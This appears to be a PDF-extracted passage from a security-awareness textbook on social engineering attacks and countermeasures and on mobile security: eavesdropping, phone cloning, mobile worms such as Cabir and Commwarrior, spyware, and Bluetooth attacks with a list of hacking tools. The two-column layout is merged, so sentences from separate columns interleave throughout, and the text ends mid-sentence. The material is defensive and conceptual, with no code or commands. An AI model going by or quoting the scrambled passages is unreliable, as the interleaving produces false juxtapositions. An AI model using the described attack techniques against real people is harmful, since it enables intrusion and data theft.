Spam mail: Spam mail can contain fraudulent billing information,
etc. and can make payment requests or ask for other information. 5) Online Scams: Some websites that make free offers or other special
deals can lure a victim to enter a username and password that may be the
Web sites: Fake Web sites can be used to request confidential infor-
same as those they use to access their work system. The hacker can use
mation such as the password or social security number of financial institu-
this valid username and password once the user enters the information in
tions.
the website form.
1) Phishing: Phishing involves sending an e-mail, usually posing as
6) Mail attachments: It can be used to send malicious code to a victims
a bank, credit-card Company, or other financial organization. The e-mail
system, which could automatically execute something like a software key
requests that the recipient confirms banking information or reset passwords
logger to capture passwords. Viruses, Trojans and worms can be included in

cleverly crafted e-mails to entice a victim to open the attachment. Mail at- mon technique is for the social engineer to call one person in the company
tachments are considered a computer-based social engineering attack. Here as a survey company and learn what products are in use and then use that
is an example of an e-mail scam which tries to convince the receiver to open knowledge to represent themselves as a vendor or support person for a prod-
an unsafe attachment. uct that is used. Politely decline to participate in surveys and if someone
represents themselves as your vendor on an unsolicited call back your ven-
7) Baiting. Baiting is when an attacker leaves a malware-infected phys-
dor contact to verify that the contact was legitimate.
ical device, such as a USB flash drive or CD-ROM, in a place it is sure to be
found. The finder then picks up the device and loads it onto his or her com- 3) Limit information in out of office messages: If youre out of office,
puter, unintentionally installing the malware. auto reply messages leave the company vulnerable. Dont directly give alter-
nate contact names or numbers with direct lines or exact lengths of outages.
8) Quid pro quo. A quid pro quo is when an attacker requests personal
You should instead direct people to call the receptionist who can provide in-
information from a party in exchange for something desirable. For example,
formation as needed. Never tell outsiders you will be unreachable. If a social
an attacker could request login credentials in exchange for a free gift.
engineer knows that you havent been in the office for a week and some oth-
9) Spear phishing. Spear phishing is like phishing, but tailored for a er people to call, they can act as if they were in an active conversation and
specific individual or organization. In these cases, the attacker is likely try- if you indicated you cannot be reached they may imply promises were made
ing to uncover confidential information specific to the receiving organization and expect them fulfilled.
in order to obtain financial data or trade secrets.
4) Escort guests in areas with Network Access: Do not leave guests
10) Pop-up windows can also be used in computer-based engineering alone in empty offices, waiting rooms, or conference rooms with direct net-
attacks, in a similar manner to e-mail attachments. Pop-up windows with work access, especially if they are not someone known to you. For all you
special offers or free stuff can encourage a user to unintentionally install know the vendor presentation they scheduled was a ruse allow them inter-
malicious software. nal access to your network and run attacks.
11) URL Obfuscation: URL is the Uniform Resource Locator and is com- 5) Question people you dont know: If you see someone you are unfa-
monly used in the address bar of a web browser to access a particular web- miliar with in your company and they are not displaying a badge, question
site. In lay terms, it is the website address. URL obfuscation is the hiding or their presence. This can be done professionally. For example, introduce
a fake URL in what appear to be a legitimate website address. For example, yourself and ask them what brings them to your company today. If people
a website of 204.13.144.2/Citibank may appear to be a legitimate web ad- are too afraid to question strangers it makes your company very easy to
dress for Citibank but in fact is not. URL obfuscation is used in phishing break in to.
attacks and some online scams to make the scam seem more legitimate. A
6) Talk about security: Regularly talk to people about security and
website address may be seen as an actual financial institution name or logo,
awareness so that they are thinking about attacks. A good social engineer
but the hyperlink leads to a fake website or IP address. When the user clicks
appears harmless so if you are not on your guard and keeping your employ-
the hyperlink, theyre redirected to the hackers site. Addresses can be ob-
ees thinking about what they say and do it is easy for an attack to succeed.
fuscated in malicious links by the use of hexadecimal or decimal notations.
7) Centralize reporting of suspicious behavior: Finally, have an indi-
vidual or small group that is made aware of any suspicious behavior, A so-
SOCIAL-ENGINEERING COUNTERMEASURES cial engineer will typically contact multiple people to gather enough informa-
tion to launch an attack counting on the fact that they will not communicate
Some best practices to help you reduce the risk of a social engineering at- with one another. If a patter s detected that looks like an attack it is much
tack against your organization. easier to prevent harm.
1) Never disclose passwords: This is fairly common sense, but ensures 8) Documentation: Documented and enforced security policies and se-
that you have policies in place to never disclose passwords. Regularly inform curity-awareness programs are the most critical component in any informa-
staff that they should never be asked for their password. Finally ensure that tion-security program. Good policies and procedures arent effective if they
you do not have any exceptions to this policy. If it is sometimes okay to give arent taught and reinforced to employees. The policies need to be commu-
a password your users need to make a judgment call and a clever social en- nicated to employees to emphasize their importance and then enforced by
gineer will find ways to exploit this. It is easy if the answer is always no. management. After receiving security-awareness training, employees will be
2) Limit IT Information being disclosed: Create a policy that only IT committed to supporting the security policies of the organization.
is able to discuss existing technology with outsiders and designate a person The corporate security policy should address how and when accounts are
to take survey and vendor calls about the companys technology. A com-

set-up and terminated, how often password are changes, who can access 5) Dont let a link in control of where you land. Stay in control by
what information and how violations or the policy are to be handled. Also, finding the website yourself using a search engine to be sure you land where
the help desk procedures for the previous tasks as well as identifying em- you intend to land. Hovering over links in email will show the actual URL at
ployees for example using an employee number or other information to val- the bottom, but a good fake can still steer you wrong.
idate a password change. The destruction of paper documents and physical
6) Curiosity leads to careless clickingif you dont know what the
access restrictions are additional areas the security policy should address.
email is about, clicking links is a poor choice. Similarly, never use phone
Lastly, the policy should address technical areas such as use of modems
numbers from the email; it is easy for a scammer to pretend youre talking
and virus control. One of the advantages of a strong security policy is that it
to a bank teller.
removes the responsibility of employees to make judgment calls regarding a
hackers request. If the requested action is prohibited by the policy, the em- 7) Email hijacking is rampant. Hackers, spammers, and social engen-
ployee has guidelines for denying it. derers taking over control of peoples email accounts (and other communi-
cation accounts) have become rampant. Once they control someones email
9) Training and awareness program: The most important countermea-
account they prey on the trust of all the persons contacts. Even when the
sure for social engineering is employee education. All employees should be
sender appears to be someone you know, if you arent expecting an email
trained on how to keep confidential data safe. Management teams are in-
with a link or attachment check with your friend before opening links or
volved in the creation and implementation of the security policy so that they
downloading.
fully understand it and support it throughout the organization. The compa-
ny security-awareness policy should require all new employees to go through 8) Beware of any download. If you dont know the sender personally
a security orientation. Annual classes should be required to provide refresh- AND expect a file from them, downloading anything is a mistake.
ers and updated information for employees.
9) Foreign offers are fake. If you receive email from a foreign lottery or
There are literally thousands of variations to social engineering attacks. The sweepstakes, money from an unknown relative or requests to transfer funds
only limit to the number of ways they can socially engineer users through from a foreign country for a share of the money it is guaranteed to be a
this kind of exploit is the criminals imagination. And you may experience scam.
multiple forms of exploits in a single attack. Then the criminal is likely to
sell your information to others so they too can run their exploits against 10) Set your spam filters to high. Every email program has spam fil-
you, your friends, your friends friends, and so on as criminals leverage peo- ters. To find yours, look under your settings options, and set these highjust
ples misplaced trust. remember to check your spam folder periodically to see if legitimate email
has been accidentally trapped there. You can also search for a step-by-step
guide to setting your spam filters by searching on the name of your email
provider plus the phrase spam filters.
DONT BECOME A VICTIM OF SOCIAL ENGINEERING ATTACK
11) Secure your computing devices. Install anti-virus software, fire-
1) Slow down. Spammers want you to act first and think later. If the
walls, email filters and keep these up-to-date. Set your operating system to
message conveys a sense of urgency or uses high-pressure sales tactics be
automatically update, and if your Smartphone doesnt automatically up-
skeptical; never let their urgency influence your careful review.
date, manually update it whenever you receive a notice to do so. Use an
2) Research the facts. Be suspicious of any unsolicited messages. If the anti-phishing tool offered by your web browser or third party to alert you to
email looks like it is from a company you use, do your own research. Use a risks.
search engine to go to the real companys site, or a phone directory to find
their phone number.
3) Delete any request for financial information or passwords. If you
get asked to reply to a message with personal information, its a scam.
4) Reject requests for help or offers of help. Legitimate companies and
organizations do not contact you to provide help. If you did not specifically
request assistance from the sender, consider any offer to help restore cred-
it scores, refinance a home, answer your question, etc., a scam. Similarly,
if you receive a request for help from a charity or organization that you do
not have a relationship with, delete it. To give, seek out reputable charitable
organizations on your own to avoid falling for a scam.

CHAPTER 8. Consumers arent the only ones making the shift to mobile devices. Mali-
cious hackers and identity thieves are following close behind. As more and
Mobile Security more people use their Smartphones and other mobile devices to do online
banking, pay bills, and store critical personal and business information,
more and more bad guys are trying to crack into this mobile device.
Objective Mobile security will be the key to winning the war against this new genera-
tion of cyber thieves. Mobile security can come in many shapes and forms.
Introductions Some protections are built directly into the device youre using.
Challenges of mobile security
Other mobile security protections are built into the network, such as strong
Mobile Vulnerabilities encryption standards for data travelling across cellular networks. But per-
Cell Phone Security Measures haps no mobile security device is as powerful as an educated consumer who
keeps his or her personal information protected and avoids downloading
Mobile Related Threats
suspicious applications or clicking on booby-trapped links.
Mobile Malwares
Mobile Based Attacks
Mobile Device Management Tools The key factors that are contributing to the increasing need for mobile se-
curity including:
obile devices: They are changing dramatically and are now as
M
INTRODUCTION
powerful as laptops and other computing devices.
Previously, mobile users primarily used their mobile devices for voice com-
pen devices and networks: Services and applications have
O
munications, with little to no mobile data activity. Data applications that
moved to IP and given the user more control, exposing the net-
were available were contained in a walled garden and only available on the
work and users to additional security risks.
mobile carriers network, thus closed off from the rest of the data world.
pplications: Thousands of applications with billions of down-
A
However, the walled garden mobile environment has now quickly changed as
load are now happening.
mobile devices are becoming more open. These open devices need open net-
works to get the full benefit of the openness of the device. This is pressuring assive increases in bandwidth from data services: These
M
mobile operators to open their networks and allow the mobile user to do are increasing the number of attacks on network signaling and
more with their devices. This in turn has led to a new phenomenon in mo- applications layers.
bile applications, as mobile users can now access thousands and thousands
of applications.
2 Challenges of Mobile Security
Mobile commerce performed over these open mobile devices is also becom-
ing much more prevalent, with many mobile users now getting more com- Threats
fortable shopping or purchasing items with their mobile device. All of these
things open the door for mobile carriers to drive new revenues. It also opens A Smartphone user is exposed to various threats when he uses his phone.
the door for new security threats that can potentially do harm to mobile us- These threats can disrupt the operation of the Smartphone, and transmit
ers and to the carriers revenue streams. or modify the user data. For these reasons, the applications deployed there
must guarantee privacy and integrity of the information they handle. In
As smart phone sales continue to take off, the potential mobile targets for addition, since some apps could themselves be malware, their functionality
hackers to perform malicious acts in order to achieve financial gain will and activities should be limited (for example, accessing location information
quickly outnumber those in the computer world. This time is approaching via GPS, address book, transmitting data on the network, sending SMS that
very quickly and mobile carriers need to prepare now to protect their net- are charged, etc.).
works and users from these new threats. The consequences of not imple-
menting security could have devastating impacts on the future growth of the There are three prime targets for attackers:
mobile industry. Data: Smartphones are devices for data management, therefore they
may contain sensitive data like credit card numbers, authentication
information, private information, activity logs (calendar, call logs);

Identity: Smartphones are highly customizable, so the device or its VULNERABILITY TO MONITORING
contents are associated with a specific person. For example, every mo-
A
ll cell telephones are radio transceivers. Your voice is transmitted
bile device can transmit information related to the owner of the mobile
through the air on radio waves.
phone contract, and an attacker may want to steal the identity of the
owner of a Smartphone to commit other offenses; R
adio waves are not directional -- they disperse in all directions so
that anyone with the right kind of radio receiver can listen in.
Availability: by attacking a Smartphone you can limit access to it and
deprive the owner of the service A
lthough the law provides penalties for the interception of cellular
telephone calls, it is easily accomplished and impossible to detect.
The sources of these attacks are the same actors found in the non-mobile
computing space: R
adio hobbyists have web sites where they exchange cell phone num-
bers of interesting targets. Opportunistic hobbyists sometimes sell
Professionals, whether commercial or military, who focus on the three
their best finds.
targets mentioned above. They steal sensitive data from the general public,
as well as undertake industrial espionage. They will also use the identity of It is easy for an eavesdropper to determine a targets phone number,
those attacked to achieve other attacks; because transmissions are going back and forth to the cell site when-
ever the cell phone has battery power and is able to receive a call.
Thieves who want to gain income through data or identities they have
stolen. The thieves will attack many people to increase their potential in- T
he scanner immediately picks up the initial transmission to the cel-
come; lular site to register the active system.
Black hat hackers who specifically attack availability. Their goal is T
he number can be entered automatically into a file of numbers for
to develop viruses and cause damage to the device. In some cases, hackers continuous monitoring.
have an interest in stealing data on devices.
Grey hat hackers who reveal vulnerabilities. Their goal is to expose
vulnerabilities of the device. Grey hat hackers do not intend on damaging VULNERABILITY TO BEING USED AS A MICROPHONE
the device or stealing data. A
cell telephone can be turned into a microphone and transmitter for
the purpose of listening to conversations in the vicinity of the phone.
3 Mobile Vulnerabilities T
his is done by transmitting a maintenance command on the control
channel to the cell phone.
There have recently been concerns about potential threats and security is-
sues in mobile phone technologies. Some analysts argue that mobile phones This command places the cell telephone in the diagnostic mode.
are vulnerable to the same sort of security risks as PCs. The truth may be W
hen this is done, conversations in the immediate area of the tele-
that the situation is worse than that. phone can be monitored over the voice channel.
1. Vulnerability to monitoring of your conversations while using the T
he user doesnt know the telephone is in the diagnostic mode and
phone. transmitting all nearby sounds until he or she tries to place a call.
2. Vulnerability of your phone being turned into a microphone to monitor T
hen, before the cell telephone can be used to place calls, the unit has
conversations in the vicinity of your phone while your phone is inactive. to be cycled off and then back on again.
3. Vulnerability to cloning, or the use of your phone number by others This threat is the reason why cell telephones are prohibited in areas
to make calls that are charged to your account. where classified or sensitive discussions are held.

VULNERABILITY TO CLONING T
hese are areas where radio hobbyists use scanners for random moni-
toring.
C
ell phone thieves dont steal cell phones in the usual sense of break-
ing into a car and taking the telephone hardware. If they come across an interesting conversation, your number may be
marked for regular selective monitoring.
Instead, they monitor the radio frequency spectrum and steal the cell
phone pair as it is being anonymously registered with a cell site. If your cell service company offers personal identification numbers
(PIN), consider using one.
C
loning is the process whereby a thief intercepts the electronic serial
number (ESN) and mobile identification number (MIN) and programs A
lthough cell PIN services are cumbersome and require that you input
those numbers into another telephone to make it identical to yours. your PIN for every call, they are an effective means of preventing clon-
ing.
O
nce cloned, the thief can place calls on the reprogrammed telephone
as though he were the legitimate subscriber.
What makes this possible is the fact that each time your cell phone is CELL PHONE SECURITY TIPS
turned on or used, it transmits the pair to the local cellular site and estab-
1. Follow general guidelines for protecting portable devices - Take
lishes a talk channel.
precautions to secure your cell phone and PDA the same way you should
It also transmits the pair when it is relocated from one cell site to another. secure your computer.
Cloning occurs most frequently in areas of high cell phone usage -- valet 2. Be careful about posting your cell phone number and email ad-
parking lots, airports, shopping malls, concert halls, sports stadiums, and dress - Attackers often use software that browses web sites for email ad-
high-congestion traffic areas in metropolitan cities. dresses. These addresses then become targets for attacks and spam. Cell
phone numbers can be collected automatically, too. By limiting the num-
No one is immune to cloning, but you can take steps to reduce the likelihood
ber of people who have access to your information, you limit your risk of
of being the next victim.
becoming a victim.
3. Do not follow links sent in email or text messages - Be suspicious
4. CELL PHONE SECURITY MEASURES of URLs sent in unsolicited email or text messages. While the links may
appear to be legitimate, they may actually direct you to a malicious web
If you are using cell phone, you can reduce the risk by following these guidelines: site.
B
ecause a cell phone can be turned into a microphone without your 4. Be wary of downloadable software - There are many sites that offer
knowledge, do not carry a cell phone into any classified area or other games and other software you can download onto your cell phone or PDA.
area where sensitive discussions are held. This software could include malicious code. Avoid downloading files from
Turn your cell phone on only when you need to place a call. sites that you do not trust. If you are getting the files from a supposedly
secure site, look for a web site certificate. If you do download a file from
Turn it off after placing the call. a web site, consider saving it to your computer and manually scanning it
Do not discuss sensitive information on a cell phone. for viruses before opening it.
W
hen you call someone from your cell phone, consider advising them 5. Evaluate your security settings - Make sure that you take advantage
that you are calling from a cell phone that is vulnerable to monitoring, of the security features offered on your device. Attackers may take advan-
and that you will be speaking generally and not get into sensitive mat- tage of Bluetooth connections to access or download information on your
ters. device. Disable Bluetooth when you are not using it to avoid unautho-
rized access.
Do not leave your cell phone unattended.
6. Guard your cell phone like you would your wallet.
If your cell phone is vehicle-mounted, turn it off before permitting va-
let parking attendants to park the car, even if the telephone automati- 7. Password-protect your device.
cally locks when the cars ignition is turned off. 8. Dont be fooled by cell phone insurance.
A
void using your cell phone within several miles of the airport, stadi- 9. Call your cell phone provider as soon as you discover the loss.
um, mall or other heavy traffic locations.
10. File a police report.

5. Mobile Related Threats 2. Lost or stolen devices: Even if sufficient security is implemented in
wireless virtual private networks (VPNs), if a device is lost or stolen, the en-
So far, mobile security threats have been a relatively minor annoyance to a
tire corporate intranet could be threatened if those devices arent protected
handful of users in Europe and Asia. But even though the risk of catching a
by password and other user-level security measures.
virus on your cell phone is still relatively small, it is continuously increasing
as the use of email and 3. Mobile viruses: Mobile viruses can be a major threat, particularly
with devices that have significant computational capabilities. Mobile devic-
Serious damage
es, in general, are susceptible to viruses in several ways: Viruses can take
Since the first mobile virus appeared in 2004, the number of different virus- advantage of security holes in applications or in the underlying operating
es, worms or other type of mobile malware has now reached about 400 and system and cause damage; applications or applets downloaded to a mobile
the number is set to double by the end of 2007 as virus writers are creating device can be as virus-prone as desktop applications; and, in some mobile
new ways to attack cell phone software. Mobile hackers already have a large OSs, malformed SMS messages can crash the device. The 911 virus caused
number of attack vectors. A mobile device can become infected via down- 13 million i-mode users to automatically place a call to Japans emergency
load, via sharing memory cards with other devices, via MMS, SMS or email, phone number.
and via Bluetooth.
4. E-mail viruses: E-mail viruses affect PDAs in much the same way
The damage that mobile viruses can do is also very diverse. The most regular e-mail viruses affect PCs (i.e., causing the PDA e-mail program to
dangerous viruses can render a phone useless or steal money from users send multiple e-mails). These viruses are costly to enterprises and interrupt
through pricey messages or calls to unwanted numbers without the users normal business too. PalmOS/LibertyCrack is an example of a PDA e-mail
knowledge. Other mobile malware is able to steal all data from a phone, lis- virus. Its a known Trojan horse that can delete all applications on a Palm
ten in on calls, monitor MMS and SMS messages, and follow a phone own- PDA.
ers tracks.
5. Spam: Spam causes disruption and drives up costs when its targeted
The mobile communication network is exposed to many security threats, toward wireless devices.
just like any other data network. The security threats are very real and
could be very harmful. We listed some of the unique mobile related security
problems below: Mobile Malwares
Capturing a subscribers data session Mobile Viruses
Spoofed SGSN or GGSN A mobile phone virus is a computer virus specif-
Spoofed Create PDP Context Request ically adapted for the cellular environment and
Spoofed Update PDP Context Request designed to spread from one vulnerable phone
to another. Although mobile phone virus hoaxes
Overbilling Attacks have been around for years, the so-called Cabir
Border Gateway bandwidth saturation virus is the first verified example. The virus was
DNS Flood created by a group from the Czech Republic and
Slovakia called 29a, who sent it to a number of
GTP Flood security software companies, including Symantec
Spoofed GTP PDP Context Delete in the United States and Kaspersky Lab in Rus-
DNS Cache Poisoning sia. Cabir is considered a proof
Gi bandwidth saturation of concept virus, because it proves that a virus can
Application Layer attacks from Handsets be written for mobile phones, something that was once doubted.
Cabir was developed for mobile phones running the Symbian and Series 60
Key mobile security concerns software, and using Bluetooth. The virus searches within Bluetooths range
(about 30 meters) for mobile phones running in discoverable mode and
1. Exposure of critical information: Small amounts of WLAN signals sends itself, disguised as a security file, to any vulnerable devices. The virus
can travel a significant distance and its possible to peep into these signals only becomes active if the recipient accepts the file and then installs it. Once
using a wireless sniffer. A wireless intruder could expose critical information installed, the virus displays the word Caribe on the devices display. Each
if sufficient security isnt implemented.

time an infected phone is turned on; the virus launches itself and scans the Service messages (MMS) and it doesnt just send itself to numbers in a us-
area for other devices to send it to. The scanning process is likely to drain ers phone book, it also replies to any received messages. Mabir is essentially
the phones batteries. Cabir can be thought of as a hybrid virus/worm: its a variant of the Cabir worm, which spreads only using Bluetooth.
mode of distribution qualifies it as a network worm, but it requires user in-
Lasco.A: Lasco.A used bluetooth and infected .SIS files; in this re-
teraction like a traditional virus.
spect it differed from the Cabir.H worm. When a user clicks the velasco.sis
Cabir is not considered very dangerous, because it doesnt cause actu- file and chooses to install it, the worm activates and starts looking for new
al damage, and because users can prevent infection by simply refusing to devices to infect over bluetooth. Files infected by Lasco.A would not be au-
accept suspicious files. However, the viruss code could be altered to cre- tomatically sent to other devices. Lasco.A worm could only be sent to mobile
ate more harmful malware that might, for example, delete any information phones that support bluetooth and were in discoverable mode.
stored on phones it infects, or send out fake messages purporting to be from
Commwarrior.Q: Commwarrior.Q will jump onto another phone using
the phones owner.
a short-range Bluetooth wireless connection. It also spreads via MMS (multi-
media messaging service) or by an infected memory card inserted into a de-
vice. Commwarrior.Q will continuously send MMS messages from midnight
Common mobile viruses
to 7 a.m. to people in an infected phones address book. It cleverly assem-
Cabir: Infects mobile phones running on Symbian OS. When a phone is in- bles a text message from the phones sent file, making it appear legitimate.
fected, the message Caribe is displayed on the phones display and is dis- After 7 a.m., however, Commwarrior.Q stops that action, as it would be no-
played every time the phone is turned on. The worm then attempts to spread ticeable to the user. It then starts scanning other phones to infect via Blue-
to other phones in the area using wireless Bluetooth signals. tooth. Commwarrior.Q will infect any Symbian OS application installation
files, called SIS files. Unlike its predecessors, the SIS files that Commwar-
Duts: A parasitic file infector virus and is the first known virus for the Pock- rior.Q infects take on random names, making them harder to identify. Pre-
etPC platform. It attempts to infect all EXE files in the current directory vious versions of Commwarrior used the same file name. The SIS files also
(infects files that are bigger than 4096 bytes) range in size from 32,100 to 32,200 bytes, making them hard to distinguish
Skulls: A Trojan horse piece of code. Once downloaded, the virus, called from MMS messages if mobile operators wanted to filter them out of their
Skulls, replaces all phone desktop icons with images of a skull. It also will networks. Commwarrior.Q cant automatically infect a phone; however,
render all phone applications, including SMSes and MMSes useless a user will be prompted if they receive an infected SIS file and they have to
accept the file. Users also get another security prompt. After that, however,
Commwarrior: First worm to use MMS messages in order to spread to oth- Commwarrior.Q will start running. Commwarrior.Q does not damage data
er devices. Can spread through Bluetooth as well. It infects devices running on a phone, but a user could incur high phone charges caused by the worm
under OS Symbian Series 60. The executable worm file once launched hunts sending messages during the night.
for accessible Bluetooth devices and sends the infected files under a random
name to various devices.
Cabir.A: Cabir is a Bluetooth using worm. Cabir replicates over Blue-
tooth connections and arrives to phone messaging inbox as caribe.sis file
Mobile Worms what contains the worm. When user clicks the caribe.sis and chooses to in-
A worm is a self-replicating virus that does not stall the Caribe.sis file the worm activates and starts looking for new devices
to infect over Bluetooth. When Cabir worm finds another Bluetooth device
alter files but resides in active memory and duplicates itself. Worms use it will start sending infected SIS files to it, and lock to that phone so that
parts of an operating system that are automatic and it wont look other phones even when the target moves out of range. Please
note that Cabir worm can reach only mobile phones that support Bluetooth,
usually invisible to the user. It is common for
and are in discoverable mode. Setting you phone into non-discoverable (hid-
worms to be noticed only when their uncontrolled replication consumes sys- den) Bluetooth mode will protect your phone from Cabir worm. But once the
tem resources, slowing or halting other tasks. phone is infected it will try to infect other systems even as user tries to dis-
able Bluetooth from system settings.
Examples
Mabir Worm: Mabir worm spreads through Multimedia Messaging

i. Trojan Horse The spyware works like this:
A Trojan horse, or Trojan for short, is a term used to describe malware that A hacker sends an SMS message to the target. The target opens the mes-
appears, to the user, to perform a desirable function but, in fact, facilitates sage, installing the spyware onto the device. That spyware, unbeknownst to
unauthorized access to the users computer system. The term comes from the victim, takes the SMS messages and forwards them on to the hacker.
the Trojan Horse story in Greek mythology. Trojan horses are not self-rep-
Mobile operators should be the most concerned because protecting devices
licating which distinguishes them from viruses and worms. Additionally,
would cost them money and a massive spyware outbreak could also have a
they require interaction with a hacker to fulfill their purpose. The hacker
financial impact. In March, malware was found that copied SMS messages
need not be the individual responsible for distributing the Trojan horse. It is
and sent them to a server where they could be retrieved by hackers. Then,
possible for hackers to scan computers on a network using a port scanner in
in September, spyware was found that could retrieve SMS messages, contact
the hope of finding one with a Trojan horse installed.
numbers and call logs. There is also mobile malware that can call a device,
The term comes from the Greek story of the Trojan War, in which the Greeks make the device answer silently without the users knowledge, and turn the
give a giant wooden horse to their foes, the Trojans, ostensibly as a peace device into a remote bug.
offering. But after the Trojans drag the horse inside their city walls, Greek
6. BLUETOOTH AND BLUETOOTH BASED ATTACKS
soldiers sneak out of the horses hollow belly and open the city gates, allow-
ing their compatriots to pour in and capture Troy. Bluetooth is an open wireless pro-
tocol for exchanging data over short
Operations which could be performed by a hacker on a target computer sys-
distances from fixed and mobile de-
tem include:
vices, creating personal area net-
1. Use of the machine as part of a Botnet (e.g. to perform Distributed De- works (PANs). Bluetooth is a high-
nial-of-service (DDoS) attacks) speed, low-power microwave wireless
2. Data Theft (e.g. passwords, security codes, credit card information) link technology, designed to connect
phones, laptops, PDAs and other por-
3. Installation of software (including other malware) table equipment together with little or
4. Downloading of files no work by the user. It was original-
5. Uploading of files ly conceived as a wireless alternative
to RS232 data cables. It can connect
6. Deletion of files
several devices, overcoming problems
7. Modification of files of synchronization.
8. Keystroke logging Bluetooth is the name for a short-range radio frequency (RF) technology that
9. Viewing the users screen operates at 2.4 GHz and is capable of transmitting voice and data. The ef-
10. Wasting computer space fective range of Bluetooth devices is 32 feet (10 meters). Bluetooth transfers
data at the rate of 1 Mbps, which is from three to eight times the average
speed of parallel and serial ports, respectively. It is also known as the IEEE
Mobile Spywares 802.15 standards. It was invented to get rid of wires. Bluetooth is more suit-
ed for connecting two point-to-point devices, whereas Wi-Fi is an IEEE stan-
Spyware is a type of malware that is installed on computers and that col- dard intended for networking.
lects information about users without their knowledge. The presence of
spyware is typically hidden from the user. Typically, spyware is secretly
installed on the users personal computer. Sometimes, however, spywares
such as key loggers are installed by the owner of a shared, corporate or pub-
lic computer on purpose in order to secretly monitor other users.
Mobile Viruses are becoming more common; so are many other security
threats to mobile devices and the data they hold.
Most recently, however, researchers have learned that hackers are now cre-
ating mobile spyware, which manipulates SMS messages and allows them to
be read by others.

i. List of applications ii. Bluetooth Hacking
Bluetooth provides an easy way of communication for a wide range of mobile
devices to communicate with each other without the need for cables or wires
A typical Bluetooth mobile phone headset.
and transfer files in between them. Bluetooth hacking has gained popularity
recently with an increasing amount of software becoming available to hack-
ers for gaining access to Bluetooth devices. Most of the hacking tools seem
to be for the Linux platform and include names such as BlueScan, BlueSniff
and BTBrowser.
More prevalent applications of Bluetooth include:

W
ireless control of and communication between a mobile phone and a
hands-free headset. This was one of the earliest applications to be-
come popular.
W
ireless networking between PCs in a confined space and where little
bandwidth is required.
W
ireless communication with PC input and output devices, the most
common being the mouse, keyboard and printer.
iii. Various Bluetooth based attacks
T
ransfer of files, contact details, calendar appointments, and remind-
How would a potential hacker exploit the Bluetooth radio in your handheld
ers between devices with OBEX.
device? Bluetooth attacks often have cute names that belie their true inten-
R
eplacement of traditional wired serial communications in test equip- tions. Here are some of the most popular Bluetooth hacks.
ment, GPS receivers, medical equipment, bar code scanners, and traf-
Bluesnarfing: This attacks involve a hacker covertly gaining access to your
fic control devices.
Bluetooth-enabled device for the purpose of retrieving information, including
F
or low bandwidth applications where higher [USB] bandwidth is not addresses, calendar information or even the devices International Mobile
required and cable-free connection desired. Equipment Identity. With the IMEI, a hacker could route your incoming calls
to his cell phone.
S
ending small advertisements from Bluetooth-enabled advertising
hoardings to other, discoverable, Bluetooth devices. Bluesnarfing was a bigger problem on cell phones between 2003 and 2004.
It is hard to do and the necessary software can be tough to obtain. Firmware
W
ireless bridge between two Industrial Ethernet (e.g., PROFINET) net- updates have reduced the threat considerably. In addition, placing your
works. phone in a non-discoverable mode makes it harder on the attacker, because
T
wo seventh-generation game consoles, Nintendos Wii and Sonys he then needs additional software to locate your Bluetooth signal.
PlayStation 3, use Bluetooth for their respective wireless controllers. Bluebugging: It means hacking into a Bluetooth device and using the com-
D
ial-up internet access on personal computers or PDAs using a da- mands of that device without notifying or alerting the user. By bluebugging,
ta-capable mobile phone as a modem. a hacker could eavesdrop on phone conversations, place phone calls, send
and receive text messages, and even connect to the Internet. Bluebugging
exploits a different vulnerability than bluesnarfing. Its a firmware issue
commonly associated with older cell phones. In the lab we were more suc-
cessful with bluesnarfing than bluebugging.

Bluejacking: Bluetooth devices have the ability to send so-called wireless BTBrowser Is a Bluetooth Browser is a J2ME app. which can browse and
business cards. A recent trend has been to send anonymous business cards explore all the surrounding Bluetooth devices. Browse to different kind of
with offensive messages and frankly, its easy to do. But it doesnt put data device information.
in jeopardy.
BTCrawler It is a Bluetooth scanner for Windows Mobile based devices. It
Bluejacking requires an attacker to be within 10 meters of a device. If some- can implement BlueJacking and BlueSnarfing attacks.
one bluejacks you, you could probably see his face. Never add bluejack mes-
Bluesnarfing It involves gaining unauthorized access to a Bluetooth enabled
sages to your contacts list. And to avoid the nuisance altogether, simply put
device for the purpose of accessing or stealing personal information or files.
your phone on non-discoverable mode.
This form of Bluetooth hacking is probably the most difficult for the hacker
to achieve and recent firmware upgrades to Bluetooth devices have reduced
the risk. Your best form of protection is to not leave your phone is discover-
Denial of service: DOS attacks occur when an attacker uses his Bluetooth
able mode.
device to repeatedly request pairing with the victims device. Unlike on the
Internet, where this type of constant request can bring down services, a Bluejacking It is a mostly harmless activity and usually involves sending
Bluetooth DOS attack is mostly just a nuisance, since no information can be a vCard (electronic business card) to another Bluetooth device with an of-
transferred, copied or attained by the attacker. fensive message in the name field. As most Bluetooth devices are still in the
10 meter range, the person who Bluejacked you is likely to be in the same
DOS attacks are the easiest to perform and can drain a devices battery or
room.
temporarily paralyze the phone or PDA. However, since this attack relies on
the proximity of the attacker to the victim, its easy to stop. Just walk away. If you are concerned, your best form of protection is to keep your devices
Bluetooth turned off when not in use. And when Bluetooth is turned on,
In the Lab, we were able to perform DOS attacks on every Bluetooth device
make sure you dont leave it in discoverable mode.
we tested. Currently, there are few software defences against this type of
assault.
v. BlueTooth Hacking Example for Fun and Profit
iv. Various Software for Bluetooth Hacking WiFi wardriving tools have now advanced to the point where it is less a sign
of techno-machismo and more a sign of social mal adjustment to actually
BlueScanner
go out and wardrive in your neighborhood. Software Defined Radio is a good
BTBrowser suggestion, but youre limited to the frequencies you can use without rela-
tively expensive equipment. Another recommendation might be investigating
BTCrawler the security characteristics of your Bluetooth enabled device.
BlueJacking Bluejacking became a relatively popular sport last year. According to the
BlueSnarfing Bluejackq with a Q site, Bluejacking is the sending unsuspecting Bluetooth
device owners unsolicited message for fun.
MagicBlueHack
Bluejacking works because many people leave their phone in the visible
BluetothHack state. This means its viewable by other Bluetooth devices within range. The
BlueScanner It search out for Bluetooth devices and extract much amount bluejacker takes advantage of the fact that Bluetooth device names can be
of information of the newly discovered device. as long as 254 characters. By temporarily changing the bluejacking devices
name to include a saucy message like Mama, konna toi tokoro made, yuko
BlueSniff It is a simple utility for discovering hidden Bluetooth devices. oide kudasaimashita *. When sent, the target phone displays a message like
Mama, konna toi tokoro made, yuko oide kudasaimashita. just sent you
BlueBugger It simply exploits the BlueBug vulnerability of the Bluetooth
a message. The social goal of Bluejacking appears to be to use a message
enabled devices. By exploiting these vulnerabilities and leaks, you can gain
interesting enough so that the receiver does not pay attention to the just
access to the phone-book, calls lists and other information of the Bluetooth
sent you a message. part of the alert, but not so interesting that the sender
device. Bluebugging involves hacking into a phone using device commands
would be arrested for violating local obscenity regulations.
without the user noticing. If the hacker were successful, they could listen in
